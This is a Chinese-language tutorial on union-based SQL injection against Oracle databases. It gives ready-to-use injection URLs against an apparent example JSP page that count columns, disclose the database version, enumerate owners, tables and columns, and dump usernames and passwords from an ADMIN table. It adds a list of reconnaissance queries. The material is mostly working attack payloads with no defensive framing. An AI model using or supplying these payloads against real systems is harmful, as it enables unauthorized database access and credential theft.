Oracle常規聯合注入
Oracle Database,又名Oracle RDBMS,或簡稱Oracle。是甲骨文公司的一款關系數據庫管理系統。
Oracle對於MYSQL、MSSQL來說意味着更大的數據量,更大的權限。
oracle注入中需要注意的一些小點:
- Oracle 在使用union 查詢的跟Mysql不一樣Mysql里面我用1,2,3,4就能占位,而在Oracle里面有比較嚴格的類型要求。也就是說你
union select的要和前面的字段類型一樣,我們可以用null來代替站位。- Oracle和mysql不一樣,分頁中沒有limit,而是使用三層查詢嵌套的方式實現分頁(查詢第一條數據“>=0<=1”) 例如:
SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >= 0
3. Oracle的單行注釋符號是--,多行注釋符號/**/。
依舊提交order by 去猜測顯示當前頁面所用的SQL查詢了多少個字段,也就是確認查詢字段數。
http://www.jsporcle.com/a.jsp?username=SMITH%27%20order%20by%208%20--
http://www.jsporcle.com/a.jsp?username=SMITH%27%20union%20select%20null,null,null,null,null,null,null,null%20from%20dual%20--
爆數據庫版本
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual --
其他查詢信息語句:
1 當前用戶權限 (select * from session_roles) 2 當前數據庫版本 ( select banner from sys.v_$version where rownum=1) 3 服務器出口IP (用utl_http.request 可以實現) 4 服務器監聽IP (select utl_inaddr.get_host_address from dual) 5 服務器操作系統 (select member from v$logfile where rownum=1) 6 服務器sid (select instance_name from v$instance) 7 當前連接用戶 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual) 8 當前用戶 (SELECT user FROM dual)
爆庫名:
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual --
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select owner from all_tables where rownum=1 and owner <>'SYS' ),null,null,null,null,null from dual --
爆表:
表 一定要是大寫的
查詢第一個表
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual --
爆列
查詢 表 ADMIN第一個列
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1),null,null,null,null,null,null from dual --
第二個列
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),null,null,null,null,null,null from dual --
查詢表ADMIN 第三個列
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and column_name<>'USERNAME' and rownum=1),null,null,null,null,null,null from dual --
查詢出來列有ID USERNAME PASSWORD
爆數據
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual --
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT USERNAME FROM ADMIN),(SELECT PASSWORD FROM ADMIN),null,null,null,null,null from dual --
一些常用的查詢語句:
當前用戶: SELECT user FROM dual; 列出所有用戶: SELECT username FROM all_users ORDER BY username; 列出數據庫 SELECT DISTINCT owner FROM all_tables; 列出表名: SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; 查詢表所有列 SELECT column_name FROM all_tab_columns WHERE TABLE_NAME='ADMIN'; 定位文件 SELECT name FROM V$DATAFILE;